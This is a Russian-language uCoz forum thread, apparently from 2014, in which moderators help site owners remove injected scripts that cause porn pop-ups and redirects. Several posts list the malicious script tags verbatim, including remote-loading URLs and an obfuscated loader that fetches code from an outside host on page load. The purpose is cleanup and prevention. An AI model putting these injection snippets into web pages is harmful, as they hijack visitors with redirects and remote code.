Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Если на вашем сайте появились порнобаннеры
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1 | 15:57:08
Если на вашем сайте постоянные перебросы на другие сайты или появляется куча всплывающих рекламных баннеров, порнобаннеров, то вы должны проверить код страниц на наличие следующих скриптов:

Код
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script>
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script>
<script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Актуальные на данный момент и самые распространенные эти скрипты

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://bobrilla.com/7h4p5qn4qhr8ee1ywr1nh01af3d31nbp'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script>

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://fasterdir.ru/8v0n2hh3me45jvyxrtdyc4164r61v4ut'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>


Код
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobatori.com/6h3mo39hhqx8pibnjyshzo13skikuus5'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobmas.ru/s/948'></script>


Код

<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?818010=LmcuKHw4NjU5MTM-KWdrbm5oaG0';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>
<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?823389=KWApL3s_MTI-NjQ5LmBsaWlvb2U';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>



Как удалить:

1) Код как правило внедряется в шаблоны Страницы сайта. Модуль новости (все шаблоны) но могут быть варианты. Иногда код внедряется во все шаблоны сайта.
Прописывается в верхней части шаблона или в самом низу. Реже встречается в футере (глобальный блок Нижняя часть сайта)

2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях
Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме
3) После очистки сайта от внедренного кода нужно обязательно сменить пароль uID профиля, которым администрируете сайт. Инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1
4) Если после изменения uID пароля на новый сложный у вас снова и снова возникает проблема внедрения чужеродного кода, то выполните следующие инструкции:
1) создайте нового пользователя в панели управления сайтом: задайте ему Логин и сложнейший пароль
2) дайте созданному пользователю права администратора, а у бывшего uID профиля, которым администрировали сайт заберите права и переведите его в низшую группу
3) в общих настройках сайта поставьте старый Вид кнопки uID авторизации и далее администрируйте сайт локально
5) Если локальный способ администрирования для вас не подходит, то создайте в системе ещё один uID профиль, на котором не будет сайтов и прав управления ни одним из сайтов. И новый созданный профиль используйте для авторизации на сайтах системы uCoz с uID авторизацией. А uID профилем, которым вы администрируете сайт или сайты заходите только к себе на сайты и более никуда. И поставьте на uID пароль администратора сайта сложнейший пароль!
6) Заберите права доступа к админ бару другим администраторам и модераторам вашего сайта. не пускайте никого в панель управления сайтом
7) Будьте внимательны к письмам, которые приходят на вашу почту. Часто мошенники имитируют письма от вебсервиса uCoz, в которых просят вас пройти или верификацию или пройти по ссылкам, также просят ввод ваших данных (вебтоп пароль и пароль uID профиля или секретный вопрос и ответ). Если вы сомневаетесь в письме, которое вам пришло от имени сервиса, вы можете всегда спросить или на форуме в этой теме //forum.ucoz.ru/forum/45-46950-1 или перешлите его сразу на адрес abuse@ucoz.ru
Будьте всегда бдительны и следите за темой //forum.ucoz.ru/forum/45-35739-1


Если вы вообще ничего не поняли, но проблема появления всплывающих порнобаннеров и переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает (если есть переброс), а так же указать происходит это под логином или под гостем

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
сondor
Сообщений: 4661
Репутация: 1528

Сообщение # 31 | 19:27:24
surgeon6948, находим в шаблонах следующее и удаляем:

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'>
</script><script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>


После чистки обязательно смените пароли, инструкция здесь: //forum.ucoz.ru/forum/45-52299-1
Сообщение отредактировал сondor - Суббота, 11 Янв 2014, 19:28:37
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 32 | 19:32:01
fogen, счетчик суперстат заражен. или удалите весь или только зараженную часть. вот часть с заражением

Код
<script src="http://superstat.ru/st.js" type="text/javascript"></script>
но лучше не пользоваться подобными счетчиками вообще. метрика и гугл аналитик дадут вам полную информацию по статистике

surgeon6948, после очистки, которую вам указали выше, обязательно смените пароль uID профиля, которым администрируете сайт
инструкция тут //forum.ucoz.ru/forum/45-52299-1 и обязательно прочитайте первое сообщение в текущей теме

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
ym
Сообщений: 1
Репутация: 0

Сообщение # 33 | 18:02:57
Прошу помощи при заходе на сайт aversrostov.ucoz.ru антивирус AVG 2013 блокирует доступ на сайт ругаясь на вирус JS/Redir . При отключении AVG на сайт есть вход перебросов нет. баннеров тоже. В чем возникает Проблема не могу понять???
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 34 | 18:05:20
ym, на сайте чисто.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Харокол
Сообщений: 4
Репутация: 0

Сообщение # 35 | 18:22:29
Здравствуйте , на днях ко мне на сайт залезла такая дрянь под названием iframe-вставки (с помощью антивирусов понял что это)
Я полазил в инете , посмотрел как его найти , но уже второй раз весь сайт пролез , нигде ничего нет. Объясните пожалуйста как избавиться от этого! Заранее огромное спасибо
за отклик. сайт http://10b-klass.ucoz.ru/
вроде происходит и под логином и под гостем
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 36 | 18:25:37
Харокол, вы уже удаляли что-то с сайта пока разбирались?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Харокол
Сообщений: 4
Репутация: 0

Сообщение # 37 | 18:27:49
webanet, я в гневе почти все скрипты снес , но лучше не стало((

Добавлено (29 Янв 2014, 18:27:49)
---------------------------------------------
webanet, я удалил штук 6 скриптов в блоках (погода,календарь,новости,вк,полезные ссылки,цитаты)

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 38 | 18:29:06
Харокол, вот и чудно. на сайте сейчас чисто как в раю. во всяком случае те куски, которые я вижу под гостем. больше не ставьте скрипты. ждите пока гугл снимет блок или через вебмастер закажите перепроверку чтобы быстрее было.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Харокол
Сообщений: 4
Репутация: 0

Сообщение # 39 | 18:29:25
гугл вебмастер пишет что вот какая зараза у меня
<script type="text/javascript" src="http://mvcreative.ru/example/6/2/snow.js">
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 40 | 18:30:20
Харокол, уже нет. отдайте на пересмотр и больше никогда не ставьте чужие скрипты
это был скрипт снега

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Харокол
Сообщений: 4
Репутация: 0

Сообщение # 41 | 18:34:58
webanet, надеюсь вы правы , подал заявку , хоть я и сам в порыве безысходности удалил неприятеля , но всеравно большое спасибо)
Natali_SPb
Сообщений: 11
Репутация: 2

Сообщение # 42 | 14:55:00
Добрый день. Периодически прорываются на сайт скрипты с порнобаннерами. Всегда удаляла из всех шаблонов без проблем.

Сегодня опять обнаружила, а удалить не могу. Система не позволяет, при попытке сохранения откорректированного шаблона пишет "Максимальная длина шаблона 75 000 символов" и не сохраняет корректировку. Но ведь в текущем ражиме длина кода по-любому больше, чем без чужого скрипта... почему сегодня не даёт внести изменения? Может какие-то новые ограничения введены ? Как тогда справляться с подобными вмешательствами. С таким "тюннингом" сайт не может нормально функционировать. sad

Все мероприятия по смене кодов проведу, может поможет ... только сейчас-то как убрать скрипты, если не даёт корректировать?

сondor
Сообщений: 4661
Репутация: 1528

Сообщение # 43 | 15:09:24
Natali_SPb, во всех шаблонах ищем скрипты:

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


Код
<a href="http://s04.flagcounter.com/more/0O58"><img src="http://s04.flagcounter.com/count/0O58/bg=FFFDFA/txt=545454/border=FCFCFC/columns=3/maxflags=21/viewers=0/labels=1/pageviews=1/" alt="free counters" border="0"></a><!--************CODE GEOMAP************-->
<script type="text/javascript" src="http://geoloc18.geovisite.com/private/geomap.js?compte=357625422123"></script>
<noscript>
<a href="http://www.geovisite.com/zoom.php" target="_blank"><img src="http://geoloc18.geovisite.com/private/geomap.php?compte=357625422123" border="0" alt=""></a></noscript>


и удаляем. Можно через быструю замену //forum.ucoz.ru/forum/24-31884-1 . После чистке обязательно смените все пороли от аккаунта инструкция здесь //forum.ucoz.ru/forum/45-52299-1
Сообщение отредактировал сondor - Понедельник, 03 Фев 2014, 15:12:47
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 44 | 15:41:46
Natali_SPb,
Цитата
если не даёт корректировать?
Скопируйте содержание глобальных блоков (html блока), может одного, колонки например, на компьютер. Затем удалите его содержимое и сохраните шаблон. После этого в принципе лимит не будет превышен и сможете редактировать остальное. В конце содержимое колонки восстановите ....

Natali_SPb
Сообщений: 11
Репутация: 2

Сообщение # 45 | 16:32:55
Спасибо. Попробую так справиться. А то я уж было подумала, что с роботами переписываюсь. )))))

Попробовала. Снесла первый и второй контейнер, но шаблоны страниц править по-прежнему не даёт. sad Сайт scalare-spb.com

Сообщение отредактировал Natali_SPb - Понедельник, 03 Фев 2014, 16:37:52
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Поиск: